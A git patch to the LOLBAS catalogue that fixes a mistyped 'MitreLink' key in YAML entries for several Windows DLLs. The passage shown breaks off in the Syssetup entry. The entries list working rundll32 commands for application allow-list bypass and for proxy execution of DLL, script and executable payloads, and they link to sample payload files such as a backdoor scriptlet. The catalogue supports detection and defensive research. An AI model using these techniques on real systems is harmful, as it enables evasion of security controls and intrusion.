From 38f9a0a0325d0090b447c2a024ec38ed14bea412 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:26:27 +0000 Subject: [PATCH] Fixed incorrect MItreLink --- yml/LOLUtilz/OtherMSBinaries/Winword.yml | 2 +- yml/OSLibraries/Advpack.yml | 134 +++++++++---------- yml/OSLibraries/Ieadvpack.yml | 128 +++++++++---------- yml/OSLibraries/Ieframe.yml | 66 +++++----- yml/OSLibraries/Mshtml.yml | 56 ++++---- yml/OSLibraries/Pcwutl.yml | 56 ++++---- yml/OSLibraries/Setupapi.yml | 92 ++++++------- yml/OSLibraries/Shdocvw.yml | 64 +++++----- yml/OSLibraries/Shell32.yml | 102 +++++++-------- yml/OSLibraries/Syssetup.yml | 88 ++++++------- yml/OSLibraries/Url.yml | 156 +++++++++++------------ yml/OSLibraries/Zipfldr.yml | 78 ++++++------ 12 files changed, 511 insertions(+), 511 deletions(-) diff --git a/yml/LOLUtilz/OtherMSBinaries/Winword.yml b/yml/LOLUtilz/OtherMSBinaries/Winword.yml index 579b05a..6befdb8 100644 --- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - MItreLink: https://attack.mitre.org/wiki/Technique/T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full_Path: - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 86c8788..7d61259 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,67 +1,67 @@ ---- -Name: Advpack.dll -Description: Utility for installing software and drivers with rundll32.exe -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\advpack.dll - - Path: c:\windows\syswow64\advpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - - Link: https://twitter.com/bohops/status/974497123101179904 - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 -Acknowledegment: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Moriarty (RegisterOCX - CMD) - Handle: '@moriarty_meng' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Advpack.dll +Description: Utility for installing software and drivers with rundll32.exe +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\advpack.dll + - Path: c:\windows\syswow64\advpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ + - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 + - Link: https://twitter.com/bohops/status/974497123101179904 + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 +Acknowledegment: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Moriarty (RegisterOCX - CMD) + Handle: '@moriarty_meng' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 93492cd..ef48be6 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,64 +1,64 @@ ---- -Name: Ieadvpack.dll -Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll - Description: Launch a DLL payload by calling the RegisterOCX function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe - Description: Launch an executable by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" - Description: Launch command line by calling the RegisterOCX function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\ieadvpack.dll - - Path: c:\windows\syswow64\ieadvpack.dll -Code_Sample: - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - - Link: https://twitter.com/pabraeken/status/991695411902599168 - - Link: https://twitter.com/0rbz_/status/974472392012689408 -Acknowledgement: - - Person: Jimmy (LaunchINFSection) - Handle: '@bohops' - - Person: Fabrizio (RegisterOCX - DLL) - Handle: '@0rbz_' - - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) - Handle: '@pabraeken' ---- +--- +Name: Ieadvpack.dll +Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe + Description: Launch an executable by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch command line by calling the RegisterOCX function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\ieadvpack.dll + - Path: c:\windows\syswow64\ieadvpack.dll +Code_Sample: + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf + - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ + - Link: https://twitter.com/pabraeken/status/991695411902599168 + - Link: https://twitter.com/0rbz_/status/974472392012689408 +Acknowledgement: + - Person: Jimmy (LaunchINFSection) + Handle: '@bohops' + - Person: Fabrizio (RegisterOCX - DLL) + Handle: '@0rbz_' + - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) + Handle: '@pabraeken' +--- diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index ab4068c..19832be 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,33 +1,33 @@ ---- -Name: Ieaframe.dll -Description: Internet Browser DLL for translating HTML code. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\ieframe.dll - - Path: c:\windows\syswow64\ieframe.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/ieframe_dll.html -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' - - Person: Adam - Handle: '@hexacorn' ---- - +--- +Name: Ieaframe.dll +Description: Internet Browser DLL for translating HTML code. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\ieframe.dll + - Path: c:\windows\syswow64\ieframe.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/ieframe_dll.html +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Adam + Handle: '@hexacorn' +--- + diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9866975..63b335a 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,28 +1,28 @@ ---- -Name: Mshtml.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" - Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). - UseCase: Launch an HTA application. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\mshtml.dll - - Path: c:\windows\syswow64\mshtml.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/998567549670477824 - - Link: https://windows10dll.nirsoft.net/mshtml_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken - Handle: '@pabraeken' ---- +--- +Name: Mshtml.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). + UseCase: Launch an HTA application. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\mshtml.dll + - Path: c:\windows\syswow64\mshtml.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/998567549670477824 + - Link: https://windows10dll.nirsoft.net/mshtml_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 35c726a..8a96d19 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,28 +1,28 @@ ---- -Name: Pcwutl.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe - Description: Launch executable by calling the LaunchApplication function. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\pcwutl.dll - - Path: c:\windows\syswow64\pcwutl.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/harr0ey/status/989617817849876488 - - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html -Acknowledgement: - - Person: Matt harr0ey - Handle: '@harr0ey' ---- +--- +Name: Pcwutl.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + Description: Launch executable by calling the LaunchApplication function. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\pcwutl.dll + - Path: c:\windows\syswow64\pcwutl.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/harr0ey/status/989617817849876488 + - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html +Acknowledgement: + - Person: Matt harr0ey + Handle: '@harr0ey' +--- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 06ab00e..a5b1655 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,46 +1,46 @@ ---- -Name: Setupapi.dll -Description: Windows Setup Application Programming Interface -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf - Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\setupapi.dll - - Path: c:\windows\syswow64\setupapi.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf -Detection: - - IOC: -Resources: - - Link: https://github.com/huntresslabs/evading-autoruns - - Link: https://twitter.com/pabraeken/status/994742106852941825 - - Link: https://windows10dll.nirsoft.net/setupapi_dll.html -Acknowledgement: - - Person: Kyle Hanslovan (COM Scriptlet) - Handle: '@KyleHanslovan' - - Person: Huntress Labs (COM Scriptlet) - Handle: '@HuntressLabs' - - Person: Casey Smith (COM Scriptlet) - Handle: '@subTee' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Setupapi.dll +Description: Windows Setup Application Programming Interface +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. + UseCase: Load an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\setupapi.dll + - Path: c:\windows\syswow64\setupapi.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct + - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf +Detection: + - IOC: +Resources: + - Link: https://github.com/huntresslabs/evading-autoruns + - Link: https://twitter.com/pabraeken/status/994742106852941825 + - Link: https://windows10dll.nirsoft.net/setupapi_dll.html +Acknowledgement: + - Person: Kyle Hanslovan (COM Scriptlet) + Handle: '@KyleHanslovan' + - Person: Huntress Labs (COM Scriptlet) + Handle: '@HuntressLabs' + - Person: Casey Smith (COM Scriptlet) + Handle: '@subTee' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7e006cf..7aeb700 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,32 +1,32 @@ ---- -Name: Shdocvw.dll -Description: Shell Doc Object and Control Library. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\shdocvw.dll - - Path: c:\windows\syswow64\shdocvw.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html -Acknowledgement: - - Person: Adam - Handle: '@hexacorn' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Shdocvw.dll +Description: Shell Doc Object and Control Library. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\shdocvw.dll + - Path: c:\windows\syswow64\shdocvw.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 7231311..d4f554c 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,51 +1,51 @@ ---- -Name: Shell32.dll -Description: Windows Shell Common Dll -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll - Description: Launch a DLL payload by calling the Control_RunDLL function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe - Description: Launch an executable by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" - Description: Launch command line by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\shell32.dll - - Path: c:\windows\syswow64\shell32.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/Hexacorn/status/885258886428725250 - - Link: https://twitter.com/pabraeken/status/991768766898941953 - - Link: https://twitter.com/mattifestation/status/776574940128485376 - - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 - - Link: https://windows10dll.nirsoft.net/shell32_dll.html -Acknowledgement: - - Person: Adam (Control_RunDLL) - Handle: '@hexacorn' - - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) - Handle: '@pabraeken' - - Person: Matt Graeber (ShellExec_RunDLL) - Handle: '@mattifestation' - - Person: Kyle Hanslovan (ShellExec_RunDLL) - Handle: '@KyleHanslovan' ---- +--- +Name: Shell32.dll +Description: Windows Shell Common Dll +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + Description: Launch a DLL payload by calling the Control_RunDLL function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + Description: Launch an executable by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + Description: Launch command line by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\shell32.dll + - Path: c:\windows\syswow64\shell32.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/Hexacorn/status/885258886428725250 + - Link: https://twitter.com/pabraeken/status/991768766898941953 + - Link: https://twitter.com/mattifestation/status/776574940128485376 + - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 + - Link: https://windows10dll.nirsoft.net/shell32_dll.html +Acknowledgement: + - Person: Adam (Control_RunDLL) + Handle: '@hexacorn' + - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) + Handle: '@pabraeken' + - Person: Matt Graeber (ShellExec_RunDLL) + Handle: '@mattifestation' + - Person: Kyle Hanslovan (ShellExec_RunDLL) + Handle: '@KyleHanslovan' +--- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index fffd442..9f8cb02 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,44 +1,44 @@ ---- -Name: Syssetup.dll -Description: Windows NT System Setup -Author: -Created: 